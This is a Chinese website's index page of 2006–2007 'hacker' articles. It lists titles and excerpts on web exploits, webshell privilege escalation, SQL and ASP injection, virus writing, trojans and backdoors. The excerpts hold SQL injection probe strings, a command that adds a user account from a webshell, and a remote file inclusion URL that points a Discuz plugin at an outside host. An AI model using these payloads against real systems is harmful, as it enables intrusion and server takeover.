欢迎来到福编程网,本站提供各种互联网专业知识!

黑客相关

  • phpwind Exp 漏洞利用

    忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.程序代码

    更新于2007-06-06
  • Win32 下病毒设计入门详细说明

    本文假定你对dos下的病毒和386PM有一定的了解。1、感染任何一个病毒都需要有寄主,把病毒代码加入寄主程序中(伴侣病毒除外)以下说明如何将病毒代码嵌入PE文件中,有关PE文件的结构请看以前的文章。PE文件的典型结构:MZHeaderDOSSTUBCODEPEHEADEROPTIONALHE

    更新于2007-04-16
  • Serv-U得到管理员密码新招 (转)

    有时候我们在获得WebShell后很高兴地用Serv-U的本地权限提升漏洞来实现完全控制肉鸡的目的,但总会出错。我们在WebShell输入的命令一般是这样的:D:\WEBu.exe“netuser11/add”很多情况下不能成功,一般会返回如下的信息:USERLocalAdministratorPASS#l@$ak

    更新于2007-02-09
  • NET IIS暴绝对路径漏洞

    Title:MicrosoftASP.NETMayDiscloseWebDirectorytoRemoteUsersinCertainCasesDescription:IftheASP.NETapplicationdoesnotfiltertheerrormessage,thewebdirectoryinformationmaybedisclosedtoremoteusersbyusinganunavailablefilewhichstartwith"~".Hi,I'm

    更新于2007-02-09
  • 超全的webshell权限提升方法

    WEBSHELL权限提升技巧c:d:e:.....C:\DocumentsandSettings\AllUsers\「开始」菜单\程序\看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\看

    更新于2007-02-09
  • 网站中的隐形炸弹eWebEditor文件上传漏洞补丁

    打开Upload.ASP文件找到下面代码:复制代码代码如下:改为:复制代码代码如下:转自:KinJAVA日志:http://jorkin.reallydo.com/article.asp?id=206

    更新于2007-02-07
  • 新欢乐时光代码分析

    28ThenCurrentString=FinalyDisk&":\"ExitDoEndIfOnErrorResumeNext'取得当前目录的所有子目录,并且放到字典中SetThisFolder=FSO.GetFolder(CurrentString)SetDicSub=CreateObject("Scripting.Dictionary")SetFolders=ThisFolder.SubFoldersFolderCoun

    更新于2007-02-07
  • 全面了解ASP注入方法 [收集总结]

    1.判断是否有注入;and1=1;and1=22.初步判断是否是mssql;anduser>03.注入参数是字符'and[查询条件]and''='4.搜索时没过滤参数的'and[查询条件]and'%25'='5.判断数据库系统;and(selectcount(*)fromsysobjects

    更新于2007-01-03
  • 最详细的SQL注入相关的命令整理 (转)第1/2页

    这篇文章主要为打击分享下一些常用SQL注入相关的命令,今天帮客户做安装的时候发现他的网站有很多漏洞,导致注入数据库也被清空了,希望大家多关于安全

    更新于2006-12-07
  • 渗透中用openrowset搞shell的方法

    渗透中用openrowset搞shell的方法得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返

    更新于2006-12-07
  • 当网站不允许上传asp cer cdx htr文件时的一个解决方法!

    前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码:见lcx大哥给的一段代码说保存为stm或者shtml看看,运行如下:HTTP_ACCEPT:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/x-shockwave-flas

    更新于2006-12-07
  • PHPSHELL又出新东东啦!

    描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1读取服务器上的文件2移动服务器上的文件3上传文件到服务器上4有回显的执行命令,不用担心

    更新于2006-12-07
  • 防止电脑被他人控制

    电脑黑客可以利用开放端口和弱口令甚至空口令漏洞侵入用户电脑。黑客可以通过QQ获取对方网段(或直接获取IP),利用扫描工具(例如:Superscan、X-scan等)扫描用户计算机端口并获取IP,再运行客户端连接工具(例如:冰河2.2)侵入用户电脑,只要你的网络是通过宽带帐

    更新于2006-11-21
  • 风讯4.0未公开Bug

    补充一句,这个东西只是看代码时随便看到的一处,其他地方还多着呢,当时写下来还没测试,我就记了下来,其中有什么不对,还望理解。哈哈~前段时间网上流行的SQL注入是利用伪造代理IP来实施攻击,这个HTTP_X_FORWARDED_FOR在一段时间内倍受人们关注,今天在看

    更新于2006-11-06
  • Discuz! 4.x SQL injection / admin credentials disclosure exploit

    前段时间发过Discuz!5.0.0GBK版本的EXP今天在CN.Tink那里看到的4.x的,我去原站转了过来,然后找了个Discuz!4.1.0测试了一下,成功,看下面截图,Discuz!5.0.0GBK版本的那个EXP又许多朋友不知道怎么用,当时我说了下,还是有朋友不明白,这次我截了图上来,不

    更新于2006-11-06
  • discuz许愿池插件远程包含漏洞

    许愿池插件的wish.php文件出的问题:require$discuz_root.'./include/discuzcode.func.php';手工利用方法:远程包含漏洞,变量discuz_root过滤不严,利用方法:http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?不一定非要txt后缀,可以改为

    更新于2006-11-06
  • 天意商务系统后台管理帐号破解html版

    /**慈勤强http://blog.csdn.net/cqq*/自从上次写了个天意商务系统破解程序之后,收到了不少朋友的来信,有询问程序原理的,有询问如何防护的。今天,我抽了一点时间,做了这个Html版,就只有这一个htm文件相信有点html知识和SQLInjection知识的朋友都能够看懂

    更新于2006-10-24
  • 黑客入侵Windows XP系统常用七大招数

    本文讲述了黑客入侵WindowsXP操作系统常用的七种方法,如果大家遇到类似那可要注意了……第一招:屏幕保护在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击

    更新于2006-10-24
  • 详解BMP木马

    首先说明这不是什么新的东西,但最近有人说我们没有,那就随便写编文章放上来了,大家自己试验一下.何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUTLOOK信件)文件,放到网页上利用IE和OE的编码漏洞实

    更新于2006-10-09
  • 浅析2004年出现的4种新后门技术

    曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象,于是人们展开了积极的防御工作,从补丁到防火墙,恨不得连网线都加个验证器,在多种多样的防御手法夹攻下,一大批后门倒下了,菜鸟们也不用提心吊胆上网了……可是后门会因此罢休吗

    更新于2006-10-03